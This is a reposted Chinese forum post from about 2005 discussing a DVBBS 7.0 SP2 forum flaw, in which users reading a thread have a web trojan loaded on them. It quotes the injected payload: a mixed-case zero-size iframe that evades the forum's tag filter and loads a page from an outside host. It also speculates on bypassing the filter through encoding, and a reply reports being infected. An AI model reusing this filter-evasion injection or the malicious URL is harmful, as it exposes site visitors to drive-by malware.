[转载]动网BBS 7.0 sp2 又有新漏洞
文章作者:xxlgyq信息来源:火狐技术联盟([url]www.wrsky.com[/url])
该漏洞应该是应用了框架,在浏览着浏览此贴时,木马页也同时打开。不需要让浏览者点击连接地址实现网页木马。估计这一漏洞是动网最致命的。
[url]http://yt2bbs.catv.net/dispbbs.asp?boardid=2&star=1&replyid=776792&id=92689&skin=0&page=3[/url]
有兴趣的朋友可以去解密,采用冰狐网页木马,小马是什么就不清楚了。
在次声明本帖绝对不是在本论坛放木马。这个漏洞刚刚出现。发出来大家探讨下。还有大家注意下 回复中没有8楼。8楼就是木马回复者帖子,但是看不到他的帖子
这可能是论坛中最致命的漏洞了
本技术论坛的老鸟们 有兴趣刨习下,也让我们菜鸟知道下原理。。。。。
小弟不材 没弄明白 明白的大哥加小弟QQ 59645
菜鸟就别加了 因为我也不会。
大家看看如下代码
var actioninfo3='单帖屏蔽';document.write (dvbbs_show_topic('776611','2','gaiyue','[url]http://admin02.21isp.cn/inc/inc/lulu.htm[/url]','','[email]gaiyue@tom.com[/email]','
上下代码不可以相连
(dvbbs_show_topic('776611','2','gaiyue','[url]http://admin02.21isp.cn/inc/inc/lulu.htm[/url]','','[email]gaiyue@tom.com[/email]','</Script><IfRAME height=0 width=0 sRc="[url]http://admin02.21isp.cn/inc/inc/lulu.htm[/url]"></IFrAME>|||||||||<Script Language=JavaScript>var actioninfo3=\'单帖屏蔽\'|||||||||','','Images/userface/image1.gif','','','','','[url]http://admin02.21isp.cn/inc/inc/lulu.htm[/url]','2005-6-30
看这个代码里面 用了 <iframe>框架标签但在论坛中此标签以被禁止。
在看看 他的<IfRAME>为什么f是小写呢? 我就怀疑他是有问题的
毕竟论坛已经禁止<iframe>标签,正常发送带有<iframe>标签的帖子肯定不能正常显示,记得我看过一篇文章把字符转换成编码,例子<iframe>==<i#07rame>#07则表示字母F。这样是否会起到欺骗做用呢?
不清楚啊 高手指点
对技术 我很痴迷,搞1天都搞不动,我很生气。 :)
szylk123的测试结果
级别: 骑士
发帖: 353
威望: 66
财富: 468
注册时间:2005-04-17
最后登陆:2005-06-30
--------------------------------------------------------------------------------
附件:
[img]http://www.wrsky.net/attachment/7_2535.jpg[/img]
我日,真的中了,大家请仔细看图,浏览帖子的时候就是加载这一段网页代码... [img]http://bbs.77169.com/UploadFile/2005-7/20057111410367.jpg[/img]
问题在这.. 看看这篇文章:[url]http://www.lxqf.com/blog/blogview.asp?logID=379[/url] [url]http://www.neeao.com/Blog/article.asp?id=919[/url]
页:
[1]